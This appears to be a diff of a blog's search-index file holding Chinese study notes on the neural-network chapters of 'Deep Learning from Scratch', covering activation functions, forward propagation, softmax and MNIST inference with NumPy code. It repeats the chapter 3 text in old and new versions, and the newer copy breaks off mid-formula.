    test_acc = network.accuracy(x_test, t_test)
    train_acc_list.append(train_acc)
    test_acc_list.append(test_acc)
    print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))

    # 绘制图形
    markers = {'train': 'o', 'test': 's'}
    x = np.arange(len(train_acc_list))
    plt.plot(x, train_acc_list, label='train acc')
    plt.plot(x, test_acc_list, label='test acc', linestyle='--')
    plt.xlabel("epochs")
    plt.ylabel("accuracy")
    plt.ylim(0, 1.0)
    plt.legend(loc='lower right')
    plt.show()
    train acc, test acc | 0.09863333333333334, 0.0958train acc, test acc | 0.7874166666666667, 0.7928train acc, test acc | 0.8762, 0.879train acc, test acc | 0.8973, 0.8996train acc, test acc | 0.9079166666666667, 0.9098train acc, test acc | 0.9134333333333333, 0.9155train acc, test acc | 0.9188, 0.9212train acc, test acc | 0.9224166666666667, 0.9248train acc, test acc | 0.9256333333333333, 0.9262train acc, test acc | 0.92945, 0.9321train acc, test acc | 0.9319666666666667, 0.9351train acc, test acc | 0.9360833333333334, 0.9372train acc, test acc | 0.93865, 0.939train acc, test acc | 0.9405, 0.9401train acc, test acc | 0.94285, 0.9412train acc, test acc | 0.9446333333333333, 0.943train acc, test acc | 0.9458166666666666, 0.9437

    png

    随着 epoch 的前进(学习的进行),我们发现使用训练数据和测试数据评价的识别精度都提高了,并且,这两个识别精度基本上没有差异(两条线基本重叠在一起)。因此,可以说这次的学习中没有发生过拟合的现象。

    4.6 小结

    • 机器学习中使用的数据集分为训练数据和测试数据。

    • 神经网络用训练数据进行学习,并用测试数据评价学习到的模型的泛化能力。

    • 神经网络的学习以损失函数为指标,更新权重参数,以使损失函数的值减小。

    • 利用某个给定的微小值的差分求导数的过程,称为数值微分。

    • 利用数值微分,可以计算权重参数的梯度。

    • 数值微分虽然费时间,但是实现起来很简单。下一章中要实现的稍微复杂一些的误差反向传播法可以高速地计算梯度。

    ]]>
    @@ -8198,7 +8198,7 @@ /posts/DL-%E6%B7%B1%E5%BA%A6%E5%AD%A6%E4%B9%A0%E5%85%A5%E9%97%A8-%E5%9F%BA%E4%BA%8EPython%E7%9A%84%E7%90%86%E8%AE%BA%E4%B8%8E%E5%AE%9E%E7%8E%B0-3-%E7%A5%9E%E7%BB%8F%E7%BD%91%E7%BB%9C/ - 正文

    3.1 从感知机到神经网络

    3.1.1 神经网络的例子

    我们把最左边的一列称为输入层,最右边的一列称为输出层,中间的一列称为中间层。中间层有时也称为隐藏层。“隐藏”一词的意思是,隐藏层的神经元(和输入层、输出层不同)肉眼看不见。另外,本书中把输入层到输出层依次称为第 0 层、第 1 层、第 2 层(层号之所以从 0 开始,是为了方便后面基于 Python 进行实现)。

    第 0 层对应输入层,第 1 层对应中间层,第 2 层对应输出层。

    png

    上图中的网络一共由 3 层神经元构成,但实质上只有 2 层神经元有权重,因此将其称为“2 层网络”。请注意,有的书也会根据构成网络的层数,把上图的网络称为“3 层网络”。本书将根据实质上拥有权重的层数(输入层、隐藏层、输出层的总数减去 1 后的数量)来表示网络的名称。

    3.1.2 复习感知机

    将式子

    $$y=\left{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

    改写为更加简洁的式子,引入新函数 $h(x)$:$y=h(b+w_1x_1+w_2x_2)$,其中

    $$h(x)=\left{\begin{matrix}0\quad(x\le 0)\1\quad (x>0)\end{matrix}\right.$$

    输入信号的总和会被函数 $h(x)$ 转换,转换后的值就是输出 $y$。
    然后,上式所表示的函数 $h(x)$,在输入超过 0 时返回 1,否则返回 0。

    3.1.3 激活函数登场

    刚才登场的 $h(x)$ 函数会将输入信号的总和转换为输出信号,这种函数一般称为激活函数(activation function)

    $$a=b+w_1x_1+w_2x_2\y=h(a)$$

    png

    上图表示神经元的○中明确显示了激活函数的计算过程,即信号的加权总和为节点 $a$,然后节点 $a$ 被激活函数 $h()$ 转换成节点 $y$。本书中,“神经元”和“节点”两个术语的含义相同。这里,我们称 $a$ 和 $y$ 为“节点”,其实它和之前所说的“神经元”含义相同。

    3.2 激活函数

    在激活函数的众多候选函数中,感知机使用了阶跃函数。那么,如果感知机使用其他函数作为激活函数的话会怎么样呢?实际上,如果将激活函数从阶跃函数换成其他函数,就可以进入神经网络的世界了。

    3.2.1sigmoid 函数

    神经网络中经常使用的一个激活函数:sigmoid 函数(sigmoid function)

    $$h(x)=\frac{1}{1+\exp(-x)}$$

    3.2.2 阶跃函数的实现

    def step_function(x):
    """
    阶跃函数(允许参数取 Numpy 数组的形式)
    """
    y = x > 0
    return y.astype(int)

    对 NumPy 数组进行不等号运算后,数组的各个元素都会进行不等号运算,生成一个布尔型数组。这里,数组 x 中大于 0 的元素被转换为 True,小于等
    于 0 的元素被转换为 False,从而生成一个新的数组 y。数组 y 是一个布尔型数组,但是我们想要的阶跃函数是会输出 int 型的 0 或 1 的函数。因此,需要把数组 y 的元素类型从布尔型转换为 int 型。

    import numpy as np

    x = np.array([-1.0, 1.0, 2.0])
    y = x > 0
    y
    array([False,  True,  True])
    y = y.astype(int)
    y
    array([0, 1, 1])

    3.2.3 阶跃函数的图形

    import numpy as np
    import matplotlib.pyplot as plt


    def strp_function(x):
    return np.array(x > 0, dtype=int)

    x = np.arange(-5.0, 5.0, 0.1)
    y = step_function(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 1.1) # 指定 y 轴的范围
    plt.show()

    png

    3.2.4sigmoid 函数的实现

    def sigmoid(x):
    return 1 / (1 + np.exp(-x))
    x = np.array([-1.0, 1.0, 2.0])
    sigmoid(x) # 根据 NumPy 的广播功能,如果在标量和 NumPy 数组之间进行运算,则标量会和 NumPy 数组的各个元素进行运算。
    array([0.26894142, 0.73105858, 0.88079708])
    x = np.arange(-5.0, 5.0, 0.1)
    y = sigmoid(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 1.1)
    plt.show()

    png

    3.2.6 非线性函数

    • 神经网络的激活函数必须使用非线性函数。

      • 使用线性函数的话,加深神经网络的层数就没有意义了。

      • 为了发挥叠加层所带来的优势,激活函数必须使用非线性函数。

    3.2.7 ReLU 函数

    在神经网络发展的历史上,sigmoid 函数很早就开始被使用了,而最近则主要使用**ReLU(Rectified Linear Unit)**函数。

    $$h(x)=\left{\begin{matrix}x\quad(x>0)\0\quad(x\le0)\end{matrix}\right.$$

    def relu(x):
    return np.maximum(0, x)
    x = np.arange(-5.0, 5.0, 0.1)
    y = relu(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 5)
    plt.show()

    png

    3.3 多维数组的运算

    3.3.3 神经网络的内积

    png

    上图中的简单神经网络为对象。这个神经网络省略了偏置和激活函数,只有权重。

    $$\mathbf{W} = \begin{pmatrix} 1 & 3 & 5\ 2 & 4 & 6 \end{pmatrix}$$

    实现该神经网络时,要注意 $\mathbf{X}$、$\mathbf{W}$、$\mathbf{Y}$ 的形状,特别是 $\mathbf{X}$ 和 $\mathbf{W}$ 的对应
    维度的元素个数是否一致,这一点很重要。

    X = np.array([1, 2])
    W = np.array([[1, 3, 5], [2, 4, 6]])
    Y = np.dot(X, W)
    Y
    array([ 5, 11, 17])

    使用np.dot(多维数组的点积),可以一次性计算出 $\mathbf{Y}$ 的结果。
    这意味着,即便 $\mathbf{Y}$ 的元素个数为 100 或 1000,也可以通过一次运算就计算出结果!如果不使用 np.dot,就必须单独计算 $\mathbf{Y}$ 的每一个元素(或者说必须使用for语句),非常麻烦。因此,通过矩阵的乘积一次性完成计算的技巧,在实现的层面上可以说是非常重要的。

    3.4 3 层神经网络的实现

    3.4.1 符号确认

    png

    3.4.2 各层间信号传递的实现

    $$a{(1)}_1=w{(1)}_{11}x_1+w{(1)}_{12}x_2+b{(1)}_1$$

    如果使用矩阵的乘法运算,则可以将第 1 层的加权和表示成下面的式:

    $$\mathbf{A}{(1)}=\mathbf{XW}{(1)}+\mathbf{B}^{(1)}$$

    其中,$\mathbf{A}{(1)}$、$\mathbf{X}$、$\mathbf{B}{(1)}$、$\mathbf{W}^{(1)}$ 如下所示:

    $\mathbf A^{(1)}=\begin{pmatrix} a^{(1)}_1 & a^{(1)}_2 & a^{(1)}_3 \end{pmatrix}$,$\mathbf{X} = \begin{pmatrix} x_1 & x_2 \end{pmatrix}$, $\mathbf{B}^{(1)} = \begin{pmatrix} b^{(1)}_1 & b^{(1)}_2 & b^{(1)}_3 \end{pmatrix}$

    $\mathbf{W}^{(1)} = \begin{pmatrix} w^{(1)}{11} & w^{(1)}{21} & w^{(1)}{31} \ w^{(1)}{12} & w^{(1)}{22} & w^{(1)}{32}\end{pmatrix}$

    输入层到第 1 层的信号传递:

    png

    import numpy as np

    X = np.array([1.0, 0.5])
    W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    B1 = np.array([[0.1, 0.2, 0.3]])

    print(W1.shape)
    print(X.shape)
    print(B1.shape)
    (2, 3)(2,)(1, 3)
    A1 = np.dot(X, W1) + B1
    A1
    array([[0.3, 0.7, 1.1]])
    Z1 = sigmoid(A1)
    Z1
    array([[0.57444252, 0.66818777, 0.75026011]])

    实现第 1 层到第 2 层的信号传递:

    png

    W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    B2 = np.array([0.1, 0.2])

    print(Z1.shape)
    print(W2.shape)
    print(B2.shape)
    (1, 3)(3, 2)(2,)
    A2 = np.dot(Z1, W2) + B2
    Z2 = sigmoid(A2)

    实现第 2 层到输出层的信号传递:

    png

    def identity_function(x):
    """
    这里我们定义了 identity_function()函数(也称为“恒等函数”),并将
    其作为输出层的激活函数。恒等函数会将输入按原样输出,因此,这个例子
    中没有必要特意定义 identity_function()。这里这样实现只是为了和之前的
    流程保持统一。
    """
    return x

    W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
    B3 = np.array([0.1, 0.2])

    A3 = np.dot(Z2, W3) + B3
    Y = identity_function(A3) # 或 Y = A3

    输出层的激活函数用 $\sigma()$ 表示,不同于隐藏层的激活函数 $h()$。

    输出层所用的激活函数,要根据求解问题的性质决定。

    • 一般地,回归问题可以使用恒等函数,二元分类问题可以使用 sigmoid 函数

    • 多元分类问题可以使用 softmax 函数

    3.4.3 代码实现小结

    def init_network():
    """
    按照神经网络的实现惯例,只把权重记为大写字母 W1,其他的(偏置或中间结果等)都用小写字母表示。
    """
    network = {}
    network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    network['b1'] = np.array([0.1, 0.2, 0.3])
    network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    network['b2'] = np.array([0.1, 0.2])
    network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
    network['b3'] = np.array([0.1, 0.2])

    return network


    def forward(network, x):
    """
    表示的是从输入到输出方向的传递处理
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = identity_function(a3)
    return y


    network = init_network()
    x = np.array([1.0, 0.5])
    y = forward(network, x)
    print(y)
    [0.31682708 0.69627909]

    3.5 输出层的设计

    3.5.1 恒等函数和 softmax 函数

    $$y_k=\frac{\exp(x_k)}{\sum^n_{i=1}\exp(a_i)}$$

    def softmax(a):
    exp_a = np.exp(a)
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a

    return y

    3.5.2 实现 softmax 函数时的注意事项

    由于要进行指数函数的运算,可能会导致溢出。

    进行改进:

    $$
    \begin{eqnarray}
    y_k &= \frac{\exp(a_k)}{\sum^n_{i=1}\exp(a_i)} &= \frac{C\exp(a_k)}{C\sum^n_{i=1}\exp(a_i)} \
    & &=\frac{\exp(a_k+\log C)}{\sum^n_{i=1}\exp(a_i+\log C)} \
    & &=\frac{\exp(a_k+C’)}{\sum^n_{i=1}\exp(a_i+C’)}
    \end{eqnarray}
    $$

    其中 $C$ 任意的常数,记 $\log C=C’$,这里的 $C’$ 可以使用任何值,但是为了防止溢出,一般会使用输入信号中的最大值。

    a = np.array([1010, 1000, 990])
    np.exp(a) / np.sum(np.exp(a))
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: overflow encountered in exp  np.exp(a) / np.sum(np.exp(a))C:\Users\gzjzx\AppData\Local\Temp\ipykernel_15664\832863605.py:2: RuntimeWarning: invalid value encountered in true_divide  np.exp(a) / np.sum(np.exp(a))array([nan, nan, nan])
    c = np.max(a)
    a - c
    array([  0, -10, -20])
    np.exp(a-c) / np.sum(np.exp(a-c))
    array([9.99954600e-01, 4.53978686e-05, 2.06106005e-09])

    综上,我们可以像下面这样实现 softmax 函数。

    def softmax(a):
    c = np.max(a)
    exp_a = np.exp(a - c) # 溢出对策
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a
    return y

    3.5.3softmax 函数的特征

    a = np.array([0.3, 2.9, 4.0])
    y = softmax(a)
    y
    array([0.01821127, 0.24519181, 0.73659691])
    np.sum(y)
    1.0
    • softmax 函数的输出是 0.0 到 1.0 之间的实数
    • softmax 函数的输出值的总和是 1

    3.5.4 输出层的神经元数量

    png

    输出层的神经元数量需要根据待解决的问题来决定。对于分类问题,输出层的神经元数量一般设定为类别的数量。

    3.6 手写数字识别

    假设学习已经全部结束,我们使用学习到的参数,先实现神经网络的“推理处理”。这个推理处理也称为神经网络的前向传播(forward propagation)

    3.6.1 MNIST 数据集

    MNIST 的图像数据是 28 像素× 28 像素的灰度图像(1 通道),各个像素的取值在 0 到 255 之间。每个图像数据都相应地标有“7”“2”“1”等标签。

    本书提供了便利的 Python 脚本 mnist.py,该脚本支持从下载 MNIST 数据
    集到将这些数据转换成 NumPy 数组等处理(mnist.py 在 dataset 目录下)。使用
    mnist.py 时,当前目录必须是 ch01、ch02、ch03、…、ch08 目录中的一个。使
    mnist.py 中的 load_mnist()函数,就可以按下述方式轻松读入 MNIST 数据。

    import sys, os
    sys.path.append(os.pardir) # 为了导入父目录中的文件而进行的设定
    from dataset.mnist import load_mnist

    # 第一次调用会花费几分钟……
    # load_mnist 函数以“( 训练图像, 训练标签),( 测试图像,测试标签)”的形式返回读入的 MNIST 数据
    (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
    Downloading train-images-idx3-ubyte.gz ... DoneDownloading train-labels-idx1-ubyte.gz ... DoneDownloading t10k-images-idx3-ubyte.gz ... DoneDownloading t10k-labels-idx1-ubyte.gz ... DoneConverting train-images-idx3-ubyte.gz to NumPy Array ...DoneConverting train-labels-idx1-ubyte.gz to NumPy Array ...DoneConverting t10k-images-idx3-ubyte.gz to NumPy Array ...DoneConverting t10k-labels-idx1-ubyte.gz to NumPy Array ...DoneCreating pickle file ...Done!
    # 输出各个数据的形状
    print(x_train.shape) # (60000, 784)
    print(t_train.shape) # (60000,)
    print(x_test.shape) # (10000, 784)
    print(t_test.shape) # (10000,)
    (60000, 784)(60000,)(10000, 784)(10000,)

    试着显示 MNIST 图像,同时也确认一下数据

    import sys, os
    sys.path.append(os.pardir)
    import numpy as np
    from dataset.mnist import load_mnist
    from PIL import Image
    import matplotlib.pyplot as plt


    def img_show(img):
    pil_img = Image.fromarray(np.uint8(img))
    pil_img.show()

    (x_train, t_train), (x_test, t_test) = load_mnist(flatten=True, normalize=False)
    img = x_train[0]
    label = t_train[0]
    print(label) # 5

    print(img.shape) # (784,)
    img = img.reshape(28, 28) # 把图像的形状变成原来的尺寸
    print(img.shape) # (28, 28)
    plt.imshow(img, cmap='gray')
    5(784,)(28, 28)<matplotlib.image.AxesImage at 0x1f5a63afca0>

    png

    3.6.2 神经网络的推理处理

    对这个 MNIST 数据集实现神经网络的推理处理。
    神经网络的输入层有 784 个神经元,输出层有 10 个神经元。

    • 输入层的 784 这个数字来源于图像大小的 28 × 28 = 784

    • 输出层的 10 这个数字来源于 10 类别分类(数字 0 到 9,共 10 类别)

    • 这个神经网络有 2 个隐藏层,第 1 个隐藏层有 50 个神经元,第 2 个隐藏层有 100 个神经元。这个 50 和 100 可以设置为任何值。

    def get_data():
    """
    获取数据
    """
    (x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, flatten=True, one_hot_label=False)
    return x_test, t_test

    将 normalize 设置成True后,函数内部会进行转换,将图像的各个像素值除以 255,使得数据的值在 0.0~1.0 的范围内。像这样把数据限定到某个范围内的处理称为正规化(normalization)。此外,对神经网络的输入数据进行某种既定的转换称为预处理(pre-processing)
    这里,作为对输入图像的一种预处理,我们进行了正规化。

    def init_network():
    """
    读入保存在 pickle 文件 sample_weight.pkl 中的学习到的权重参数
    这个文件中以字典变量的形式保存了权重和偏置参数
    """
    with open("sample_weight.pkl", 'rb') as f:
    network = pickle.load(f)
    return network
    def predict(network, x):
    """
    前向传播
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = softmax(a3)

    return y
    import pickle

    x, t = get_data()
    network = init_network()

    accuracy_cnt = 0
    for i in range(len(x)):
    """
    用 for 语句逐一取出保存在 x 中的图像数据,用 predict()函数进行分类。
    predict()函数以 NumPy 数组的形式输出各个标签对应的概率。
    """
    y = predict(network, x[i])
    p = np.argmax(y) # 获取概率最高的元素的索引
    if p == t[i]:
    accuracy_cnt += 1

    print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
    Accuracy:0.9352

    3.6.3 批处理

    输出刚才的神经网络的各层的权重的形状。

    x, _ = get_data()
    network = init_network()
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    x.shape
    (10000, 784)
    x[0].shape
    (784,)
    W1.shape
    (784, 50)
    W2.shape
    (50, 100)
    W3.shape
    (100, 10)

    从整体的处理流程来看,图 3-26 中,输入一个由 784 个元素(原本是一个 28 × 28 的二维数组)构成的一维数组后,输出一个有 10 个元素的一维数组。这是只输入一张图像数据时的处理流程。

    png

    现在我们来考虑打包输入多张图像的情形。比如,我们想用predict()
    函数一次性打包处理 100 张图像。为此,可以把 $\mathbf{x}$ 的形状改为 100 × 784,将
    100 张图像打包作为输入数据。

    png

    这种打包式的输入数据称为批(batch)。批有“捆”的意思,图像就如同纸币一样扎成一捆。

    x, t = get_data()
    network = init_network()

    batch_size = 100 # 批数量
    accuracy_cnt = 0

    for i in range(0, len(x), batch_size):
    """
    在 range()函数生成的列表的基础上,通过 x[i:i+batch_size]从输入数据中抽出批数据。
    x[i:i+batch_n]会取出从第 i 个到第 i+batch_n 个之间的数据。
    """
    x_batch = x[i:i+batch_size]
    y_batch = predict(network, x_batch)
    """
    参数 axis=1。这指定了在 100 × 10 的数组中,沿着第 1 维方向(以第 1 维为轴)
    找到值最大的元素的索引(第 0 维对应第 1 个维度)。
    """
    p = np.argmax(y_batch, axis=1) #
    accuracy_cnt += np.sum(p == t[i:i+batch_size])

    print("Accuracy:" + str(float(accuracy_cnt) / len(x)))
    Accuracy:0.9352

    3.7 小结

    • 神经网络中的激活函数使用平滑变化的 sigmoid 函数或 ReLU 函数。

    • 通过巧妙地使用 NumPy 多维数组,可以高效地实现神经网络。

    • 机器学习的问题大体上可以分为回归问题和分类问题。

    • 关于输出层的激活函数,回归问题中一般用恒等函数,分类问题中一般用 softmax 函数。

    • 分类问题中,输出层的神经元的数量设置为要分类的类别数。

    • 输入数据的集合称为批。通过以批为单位进行推理处理,能够实现高速的运算。

    ]]>
    + 正文

    3.1 从感知机到神经网络

    3.1.1 神经网络的例子

    我们把最左边的一列称为输入层,最右边的一列称为输出层,中间的一列称为中间层。中间层有时也称为隐藏层。“隐藏”一词的意思是,隐藏层的神经元(和输入层、输出层不同)肉眼看不见。另外,本书中把输入层到输出层依次称为第 0 层、第 1 层、第 2 层(层号之所以从 0 开始,是为了方便后面基于 Python 进行实现)。

    第 0 层对应输入层,第 1 层对应中间层,第 2 层对应输出层。

    png

    上图中的网络一共由 3 层神经元构成,但实质上只有 2 层神经元有权重,因此将其称为“2 层网络”。请注意,有的书也会根据构成网络的层数,把上图的网络称为“3 层网络”。本书将根据实质上拥有权重的层数(输入层、隐藏层、输出层的总数减去 1 后的数量)来表示网络的名称。

    3.1.2 复习感知机

    将式子

    $$y=\left{\begin{matrix}0\quad (b+w_1x_1+w_2x_2\le 0)\1\quad(b+w_1x_1+w_2x_2>0)\end{matrix}\right.$$

    改写为更加简洁的式子,引入新函数 $h(x)$:$y=h(b+w_1x_1+w_2x_2)$,其中

    $$h(x)=\left{\begin{matrix}0\quad(x\le 0)\1\quad (x>0)\end{matrix}\right.$$

    输入信号的总和会被函数 $h(x)$ 转换,转换后的值就是输出 $y$。
    然后,上式所表示的函数 $h(x)$,在输入超过 0 时返回 1,否则返回 0。

    3.1.3 激活函数登场

    刚才登场的 $h(x)$ 函数会将输入信号的总和转换为输出信号,这种函数一般称为激活函数(activation function)

    $$a=b+w_1x_1+w_2x_2\y=h(a)$$

    png

    上图表示神经元的○中明确显示了激活函数的计算过程,即信号的加权总和为节点 $a$,然后节点 $a$ 被激活函数 $h()$ 转换成节点 $y$。本书中,“神经元”和“节点”两个术语的含义相同。这里,我们称 $a$ 和 $y$ 为“节点”,其实它和之前所说的“神经元”含义相同。

    3.2 激活函数

    在激活函数的众多候选函数中,感知机使用了阶跃函数。那么,如果感知机使用其他函数作为激活函数的话会怎么样呢?实际上,如果将激活函数从阶跃函数换成其他函数,就可以进入神经网络的世界了。

    3.2.1sigmoid 函数

    神经网络中经常使用的一个激活函数:sigmoid 函数(sigmoid function)

    $$h(x)=\frac{1}{1+\exp(-x)}$$

    3.2.2 阶跃函数的实现

    1
    2
    3
    4
    5
    6
    def step_function(x):
    """
    阶跃函数(允许参数取 Numpy 数组的形式)
    """
    y = x > 0
    return y.astype(int)

    对 NumPy 数组进行不等号运算后,数组的各个元素都会进行不等号运算,生成一个布尔型数组。这里,数组 x 中大于 0 的元素被转换为 True,小于等
    于 0 的元素被转换为 False,从而生成一个新的数组 y。数组 y 是一个布尔型数组,但是我们想要的阶跃函数是会输出 int 型的 0 或 1 的函数。因此,需要把数组 y 的元素类型从布尔型转换为 int 型。

    1
    2
    3
    4
    5
    import numpy as np

    x = np.array([-1.0, 1.0, 2.0])
    y = x > 0
    y
    array([False,  True,  True])
    1
    2
    y = y.astype(int)
    y
    array([0, 1, 1])

    3.2.3 阶跃函数的图形

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    import numpy as np
    import matplotlib.pyplot as plt


    def strp_function(x):
    return np.array(x > 0, dtype=int)

    x = np.arange(-5.0, 5.0, 0.1)
    y = step_function(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 1.1) # 指定 y 轴的范围
    plt.show()

    png

    3.2.4sigmoid 函数的实现

    1
    2
    def sigmoid(x):
    return 1 / (1 + np.exp(-x))
    1
    2
    x = np.array([-1.0, 1.0, 2.0])
    sigmoid(x) # 根据 NumPy 的广播功能,如果在标量和 NumPy 数组之间进行运算,则标量会和 NumPy 数组的各个元素进行运算。
    array([0.26894142, 0.73105858, 0.88079708])
    1
    2
    3
    4
    5
    x = np.arange(-5.0, 5.0, 0.1)
    y = sigmoid(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 1.1)
    plt.show()

    png

    3.2.6 非线性函数

    • 神经网络的激活函数必须使用非线性函数。

      • 使用线性函数的话,加深神经网络的层数就没有意义了。

      • 为了发挥叠加层所带来的优势,激活函数必须使用非线性函数。

    3.2.7 ReLU 函数

    在神经网络发展的历史上,sigmoid 函数很早就开始被使用了,而最近则主要使用**ReLU(Rectified Linear Unit)**函数。

    $$h(x)=\left{\begin{matrix}x\quad(x>0)\0\quad(x\le0)\end{matrix}\right.$$

    1
    2
    def relu(x):
    return np.maximum(0, x)
    1
    2
    3
    4
    5
    x = np.arange(-5.0, 5.0, 0.1)
    y = relu(x)
    plt.plot(x, y)
    plt.ylim(-0.1, 5)
    plt.show()

    png

    3.3 多维数组的运算

    3.3.3 神经网络的内积

    png

    上图中的简单神经网络为对象。这个神经网络省略了偏置和激活函数,只有权重。

    $$\mathbf{W} = \begin{pmatrix} 1 & 3 & 5\ 2 & 4 & 6 \end{pmatrix}$$

    实现该神经网络时,要注意 $\mathbf{X}$、$\mathbf{W}$、$\mathbf{Y}$ 的形状,特别是 $\mathbf{X}$ 和 $\mathbf{W}$ 的对应
    维度的元素个数是否一致,这一点很重要。

    1
    2
    3
    4
    X = np.array([1, 2])
    W = np.array([[1, 3, 5], [2, 4, 6]])
    Y = np.dot(X, W)
    Y
    array([ 5, 11, 17])

    使用np.dot(多维数组的点积),可以一次性计算出 $\mathbf{Y}$ 的结果。
    这意味着,即便 $\mathbf{Y}$ 的元素个数为 100 或 1000,也可以通过一次运算就计算出结果!如果不使用 np.dot,就必须单独计算 $\mathbf{Y}$ 的每一个元素(或者说必须使用for语句),非常麻烦。因此,通过矩阵的乘积一次性完成计算的技巧,在实现的层面上可以说是非常重要的。

    3.4 3 层神经网络的实现

    3.4.1 符号确认

    png

    3.4.2 各层间信号传递的实现

    $$a{(1)}_1=w{(1)}_{11}x_1+w{(1)}_{12}x_2+b{(1)}_1$$

    如果使用矩阵的乘法运算,则可以将第 1 层的加权和表示成下面的式:

    $$\mathbf{A}{(1)}=\mathbf{XW}{(1)}+\mathbf{B}^{(1)}$$

    其中,$\mathbf{A}{(1)}$、$\mathbf{X}$、$\mathbf{B}{(1)}$、$\mathbf{W}^{(1)}$ 如下所示:

    $\mathbf A^{(1)}=\begin{pmatrix} a^{(1)}_1 & a^{(1)}_2 & a^{(1)}_3 \end{pmatrix}$,$\mathbf{X} = \begin{pmatrix} x_1 & x_2 \end{pmatrix}$, $\mathbf{B}^{(1)} = \begin{pmatrix} b^{(1)}_1 & b^{(1)}_2 & b^{(1)}_3 \end{pmatrix}$

    $\mathbf{W}^{(1)} = \begin{pmatrix} w^{(1)}{11} & w^{(1)}{21} & w^{(1)}{31} \ w^{(1)}{12} & w^{(1)}{22} & w^{(1)}{32}\end{pmatrix}$

    输入层到第 1 层的信号传递:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    import numpy as np

    X = np.array([1.0, 0.5])
    W1 = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    B1 = np.array([[0.1, 0.2, 0.3]])

    print(W1.shape)
    print(X.shape)
    print(B1.shape)
    (2, 3)(2,)(1, 3)
    1
    2
    A1 = np.dot(X, W1) + B1
    A1
    array([[0.3, 0.7, 1.1]])
    1
    2
    Z1 = sigmoid(A1)
    Z1
    array([[0.57444252, 0.66818777, 0.75026011]])

    实现第 1 层到第 2 层的信号传递:

    png

    1
    2
    3
    4
    5
    6
    W2 = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    B2 = np.array([0.1, 0.2])

    print(Z1.shape)
    print(W2.shape)
    print(B2.shape)
    (1, 3)(3, 2)(2,)
    1
    2
    A2 = np.dot(Z1, W2) + B2
    Z2 = sigmoid(A2)

    实现第 2 层到输出层的信号传递:

    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    def identity_function(x):
    """
    这里我们定义了 identity_function()函数(也称为“恒等函数”),并将
    其作为输出层的激活函数。恒等函数会将输入按原样输出,因此,这个例子
    中没有必要特意定义 identity_function()。这里这样实现只是为了和之前的
    流程保持统一。
    """
    return x

    W3 = np.array([[0.1, 0.3], [0.2, 0.4]])
    B3 = np.array([0.1, 0.2])

    A3 = np.dot(Z2, W3) + B3
    Y = identity_function(A3) # 或 Y = A3

    输出层的激活函数用 $\sigma()$ 表示,不同于隐藏层的激活函数 $h()$。

    输出层所用的激活函数,要根据求解问题的性质决定。

    • 一般地,回归问题可以使用恒等函数,二元分类问题可以使用 sigmoid 函数

    • 多元分类问题可以使用 softmax 函数

    3.4.3 代码实现小结

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    def init_network():
    """
    按照神经网络的实现惯例,只把权重记为大写字母 W1,其他的(偏置或中间结果等)都用小写字母表示。
    """
    network = {}
    network['W1'] = np.array([[0.1, 0.3, 0.5], [0.2, 0.4, 0.6]])
    network['b1'] = np.array([0.1, 0.2, 0.3])
    network['W2'] = np.array([[0.1, 0.4], [0.2, 0.5], [0.3, 0.6]])
    network['b2'] = np.array([0.1, 0.2])
    network['W3'] = np.array([[0.1, 0.3], [0.2, 0.4]])
    network['b3'] = np.array([0.1, 0.2])

    return network


    def forward(network, x):
    """
    表示的是从输入到输出方向的传递处理
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = identity_function(a3)
    return y


    network = init_network()
    x = np.array([1.0, 0.5])
    y = forward(network, x)
    print(y)
    [0.31682708 0.69627909]

    3.5 输出层的设计

    3.5.1 恒等函数和 softmax 函数

    $$y_k=\frac{\exp(x_k)}{\sum^n_{i=1}\exp(a_i)}$$

    1
    2
    3
    4
    5
    6
    def softmax(a):
    exp_a = np.exp(a)
    sum_exp_a = np.sum(exp_a)
    y = exp_a / sum_exp_a

    return y

    3.5.2 实现 softmax 函数时的注意事项

    由于要进行指数函数的运算,可能会导致溢出。

    进行改进:

    $$
    \begin{eqnarray}
